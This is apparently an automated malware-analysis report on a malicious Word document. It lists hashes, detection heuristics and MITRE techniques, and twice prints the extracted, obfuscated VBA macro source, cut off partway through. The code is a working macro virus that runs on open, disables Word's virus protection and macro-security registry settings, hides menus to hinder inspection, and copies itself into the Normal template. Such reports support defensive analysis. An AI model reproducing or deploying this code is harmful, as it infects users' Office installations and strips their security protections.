Office (OLE) malware analysis — malicious · f81d453292048b79

MALICIOUS

Office (OLE)

38.0 KB Created: 2003-03-30 17:32:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14

MD5: 6cf6479fc338dc47c71de00950ec400c SHA-1: 8b0b01bedc416868180385efaf2ee97e57efcbfb SHA-256: f81d453292048b79aa0fe6b06ec2d6ac8e9d88d879083c8f526185aa9c19e120

200 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1564.004 Hide Artifacts: Masquerading

The sample contains VBA macros that execute automatically upon opening the document, as indicated by the Document_Open macro and CreateObject heuristic firings. The script attempts to lower macro security settings by modifying registry keys related to Office security. It also disables certain menu items under the 'Tools' menu to hinder analysis. The ClamAV detection name 'Win.Trojan.W97M-10' suggests a macro-based trojan.

Heuristics 5

ClamAV: Win.Trojan.W97M-10 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.W97M-10
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9068 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9068 bytes
SHA-256: `6c351e683dc3b88ef25eeaca171397769b58558ffe13451da78f1abcb8852b4c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modulo1" ' WordMacro/ZWMVC.ZWMVC_Macro constructed by Zed, 30/03/2003 Private Declare Function SetSysColors Lib "user32" (ByVal nChanges As Long, lpSysColor As Long, lpColorValues As Long) As Long Private Sub Document_Open() On Error Resume Next If Options.VirusProtection = True Then Options.VirusProtection = False End If If Options.ConfirmConversions = True Then Options.ConfirmConversions = False End If If Options.SaveNormalPrompt = True Then Options.SaveNormalPrompt = False End If q7o3z6k8N10i10k1V9b7U10M1i2i4f7g5o10h9v5 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" _ & Application.Version & "\Word\Security" For M1R1X5h4e5P10K4a8B3w6p6N3 = 0 To 1 S8R5f7v6N1u8M4E5j2C7X8l9J2J1 = Array("Level", "AccessVBOM") C10z5X7w7H3S5m6c5J3b2N6S2Z4P9s2f9m6m1o1Z9k3i3t8r4 = S8R5f7v6N1u8M4E5j2C7X8l9J2J1(M1R1X5h4e5P10K4a8B3w6p6N3) System.PrivateProfileString("", q7o3z6k8N10i10k1V9b7U10M1i2i4f7g5o10h9v5, C10z5X7w7H3S5m6c5J3b2N6S2Z4P9s2f9m6m1o1Z9k3i3t8r4) = 1& Next M1R1X5h4e5P10K4a8B3w6p6N3 For c1m5z2F1D4p8s7D3H4s8E4y10n10v3 = 0 To 2 p7X1q7m5P1e9M3w1j5c6a1 = Array("Macro", "Templates and Add-Ins...", "Customize...") E2E2X5G2A6d9W5m7X10 = p7X1q7m5P1e9M3w1j5c6a1(c1m5z2F1D4p8s7D3H4s8E4y10n10v3) If CommandBars("Tools").Controls(E2E2X5G2A6d9W5m7X10).Enabled = True Then CommandBars("Tools").Controls(E2E2X5G2A6d9W5m7X10).Enabled = False End If Next c1m5z2F1D4p8s7D3H4s8E4y10n10v3 For K8o10n4e9M2i5w10p6X7G6x3y1K10 = 0 To 1 X7P1b1t5n1R5e2K8D1c6P5 = Array("Toolbars", "Status Bar") z4t5e6R6w7d6K7g2B2v2C10o7r2L5n5u10j7j1D8i9w10x6G3K7T9 = X7P1b1t5n1R5e2K8D1c6P5(K8o10n4e9M2i5w10p6X7G6x3y1K10) If CommandBars("View").Controls(z4t5e6R6w7d6K7g2B2v2C10o7r2L5n5u10j7j1D8i9w10x6G3K7T9).Enabled = True Then CommandBars("View").Controls(z4t5e6R6w7d6K7g2B2v2C10o7r2L5n5u10j7j1D8i9w10x6G3K7T9).Enabled = False End If Next K8o10n4e9M2i5w10p6X7G6x3y1K10 For I2K6K10H8C5W4Q4t2Z6N1j8Z10O6x6C7c6T5r1J7I10n9g6 = 0 To 1 u2w10j5X9Y6A8I4P3T10N3u8r10c4o8j5G10J8n1d3V10V8A3Q1J8o6 = Array("Macros...", "Security...") R6q9Q4 = u2w10j5X9Y6A8I4P3T10N3u8r10c4o8j5G10J8n1d3V10V8A3Q1J8o6(I2K6K10H8C5W4Q4t2Z6N1j8Z10O6x6C7c6T5r1J7I10n9g6) If CommandBars("Macro").Controls(R6q9Q4).Enabled = True Then CommandBars("Macro").Controls(R6q9Q4).Enabled = False End If Next I2K6K10H8C5W4Q4t2Z6N1j8Z10O6x6C7c6T5r1J7I10n9g6 If CommandBars("Format").Controls("Style...").Enabled = True Then CommandBars("Format").Controls("Style...").Enabled = False End If Set n10G8L7g10J3v5A7Y9 = ActiveDocument.VBProject.VBComponents(1) Set n4u1h6K10w8W5Y9L9f9M6I9C6 = NormalTemplate.VBProject.VBComponents(1) If n4u1h6K10w8W5Y9L9f9M6I9C6.Name <> "ZWMVC_Macro" Then Set l7d7c7d5r10N1M2o8 = n4u1h6K10w8W5Y9L9f9M6I9C6.CodeModule Set F7H1l6a5K1F10w1y5x7D7D9 = n10G8L7g10J3v5A7Y9.CodeModule l7d7c7d5r10N1M2o8.DeleteLines 1, l7d7c7d5r10N1M2o8.CountOfLines l7d7c7d5r10N1M2o8.InsertLines 1, F7H1l6a5K1F10w1y5x7D7D9.Lines(1, F7H1l6a5K1F10w1y5x7D7D9.CountOfLines) n4u1h6K10w8W5Y9L9f9M6I9C6.Name = "ZWMVC_Macro" End If If n10G8L7g10J3v5A7Y9.Name <> "ZWMVC_Macro" Then Set Y6t4I6i4o9 = n10G8L7g10J3v5A7Y9.CodeModule Set K10r5I2d7f3F10e5Q2d9c2b10P10Z1n8w7U8n5K8D10E8u5p4n10y5 = n4u1h6K10w8W5Y9L9f9M6I9C6.CodeModule Y6t4I6i4o9.DeleteLines 1, Y6t4I6i4o9.CountOfLines Y6t4I6i4o9.InsertLines 1, K10r5I2d7f3F10e5Q2d9c2b10P10Z1n8w7U8n5K8D10E8u5p4n10y5.Lines(1, K10r5I2d7f3F10e5Q2d9c2b10P10Z1n8w7U8n5K8D10E8u5p4n10y5.CountOfLines) n10G8L7g10J3v5A7Y9.Name = "ZWMVC_Macro" End If If n4u1h6K10w8W5Y9L9f9M6I9C6.Name = "ZWMVC_Macro" Then NormalTemplate.Save NormalTemplate.Saved = True End If Do l7d7c7d5r10N1M2o8 = l7d7c7d5r10N1M2o8 + 1 Random ... (truncated)

SHA-256: 6c351e683dc3b88ef25eeaca171397769b58558ffe13451da78f1abcb8852b4c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modulo1"
' WordMacro/ZWMVC.ZWMVC_Macro constructed by Zed, 30/03/2003
Private Declare Function SetSysColors Lib "user32" (ByVal nChanges As Long, lpSysColor As Long, lpColorValues As Long) As Long
Private Sub Document_Open()
On Error Resume Next
If Options.VirusProtection = True Then
    Options.VirusProtection = False
End If
If Options.ConfirmConversions = True Then
    Options.ConfirmConversions = False
End If
If Options.SaveNormalPrompt = True Then
    Options.SaveNormalPrompt = False
End If
q7o3z6k8N10i10k1V9b7U10M1i2i4f7g5o10h9v5 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" _
& Application.Version & "\Word\Security"
For M1R1X5h4e5P10K4a8B3w6p6N3 = 0 To 1
    S8R5f7v6N1u8M4E5j2C7X8l9J2J1 = Array("Level", "AccessVBOM")
    C10z5X7w7H3S5m6c5J3b2N6S2Z4P9s2f9m6m1o1Z9k3i3t8r4 = S8R5f7v6N1u8M4E5j2C7X8l9J2J1(M1R1X5h4e5P10K4a8B3w6p6N3)
    System.PrivateProfileString("", q7o3z6k8N10i10k1V9b7U10M1i2i4f7g5o10h9v5, C10z5X7w7H3S5m6c5J3b2N6S2Z4P9s2f9m6m1o1Z9k3i3t8r4) = 1&
Next M1R1X5h4e5P10K4a8B3w6p6N3
For c1m5z2F1D4p8s7D3H4s8E4y10n10v3 = 0 To 2
    p7X1q7m5P1e9M3w1j5c6a1 = Array("Macro", "Templates and Add-Ins...", "Customize...")
    E2E2X5G2A6d9W5m7X10 = p7X1q7m5P1e9M3w1j5c6a1(c1m5z2F1D4p8s7D3H4s8E4y10n10v3)
    If CommandBars("Tools").Controls(E2E2X5G2A6d9W5m7X10).Enabled = True Then
        CommandBars("Tools").Controls(E2E2X5G2A6d9W5m7X10).Enabled = False
    End If
Next c1m5z2F1D4p8s7D3H4s8E4y10n10v3
For K8o10n4e9M2i5w10p6X7G6x3y1K10 = 0 To 1
    X7P1b1t5n1R5e2K8D1c6P5 = Array("Toolbars", "Status Bar")
    z4t5e6R6w7d6K7g2B2v2C10o7r2L5n5u10j7j1D8i9w10x6G3K7T9 = X7P1b1t5n1R5e2K8D1c6P5(K8o10n4e9M2i5w10p6X7G6x3y1K10)
    If CommandBars("View").Controls(z4t5e6R6w7d6K7g2B2v2C10o7r2L5n5u10j7j1D8i9w10x6G3K7T9).Enabled = True Then
        CommandBars("View").Controls(z4t5e6R6w7d6K7g2B2v2C10o7r2L5n5u10j7j1D8i9w10x6G3K7T9).Enabled = False
    End If
Next K8o10n4e9M2i5w10p6X7G6x3y1K10
For I2K6K10H8C5W4Q4t2Z6N1j8Z10O6x6C7c6T5r1J7I10n9g6 = 0 To 1
    u2w10j5X9Y6A8I4P3T10N3u8r10c4o8j5G10J8n1d3V10V8A3Q1J8o6 = Array("Macros...", "Security...")
    R6q9Q4 = u2w10j5X9Y6A8I4P3T10N3u8r10c4o8j5G10J8n1d3V10V8A3Q1J8o6(I2K6K10H8C5W4Q4t2Z6N1j8Z10O6x6C7c6T5r1J7I10n9g6)
    If CommandBars("Macro").Controls(R6q9Q4).Enabled = True Then
        CommandBars("Macro").Controls(R6q9Q4).Enabled = False
    End If
Next I2K6K10H8C5W4Q4t2Z6N1j8Z10O6x6C7c6T5r1J7I10n9g6
If CommandBars("Format").Controls("Style...").Enabled = True Then
    CommandBars("Format").Controls("Style...").Enabled = False
End If
Set n10G8L7g10J3v5A7Y9 = ActiveDocument.VBProject.VBComponents(1)
Set n4u1h6K10w8W5Y9L9f9M6I9C6 = NormalTemplate.VBProject.VBComponents(1)
If n4u1h6K10w8W5Y9L9f9M6I9C6.Name <> "ZWMVC_Macro" Then
    Set l7d7c7d5r10N1M2o8 = n4u1h6K10w8W5Y9L9f9M6I9C6.CodeModule
    Set F7H1l6a5K1F10w1y5x7D7D9 = n10G8L7g10J3v5A7Y9.CodeModule
    l7d7c7d5r10N1M2o8.DeleteLines 1, l7d7c7d5r10N1M2o8.CountOfLines
    l7d7c7d5r10N1M2o8.InsertLines 1, F7H1l6a5K1F10w1y5x7D7D9.Lines(1, F7H1l6a5K1F10w1y5x7D7D9.CountOfLines)
    n4u1h6K10w8W5Y9L9f9M6I9C6.Name = "ZWMVC_Macro"
End If
If n10G8L7g10J3v5A7Y9.Name <> "ZWMVC_Macro" Then
    Set Y6t4I6i4o9 = n10G8L7g10J3v5A7Y9.CodeModule
    Set K10r5I2d7f3F10e5Q2d9c2b10P10Z1n8w7U8n5K8D10E8u5p4n10y5 = n4u1h6K10w8W5Y9L9f9M6I9C6.CodeModule
    Y6t4I6i4o9.DeleteLines 1, Y6t4I6i4o9.CountOfLines
    Y6t4I6i4o9.InsertLines 1, K10r5I2d7f3F10e5Q2d9c2b10P10Z1n8w7U8n5K8D10E8u5p4n10y5.Lines(1, K10r5I2d7f3F10e5Q2d9c2b10P10Z1n8w7U8n5K8D10E8u5p4n10y5.CountOfLines)
    n10G8L7g10J3v5A7Y9.Name = "ZWMVC_Macro"
End If
If n4u1h6K10w8W5Y9L9f9M6I9C6.Name = "ZWMVC_Macro" Then
    NormalTemplate.Save
    NormalTemplate.Saved = True
End If

    Do
    l7d7c7d5r10N1M2o8 = l7d7c7d5r10N1M2o8 + 1
    Random
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.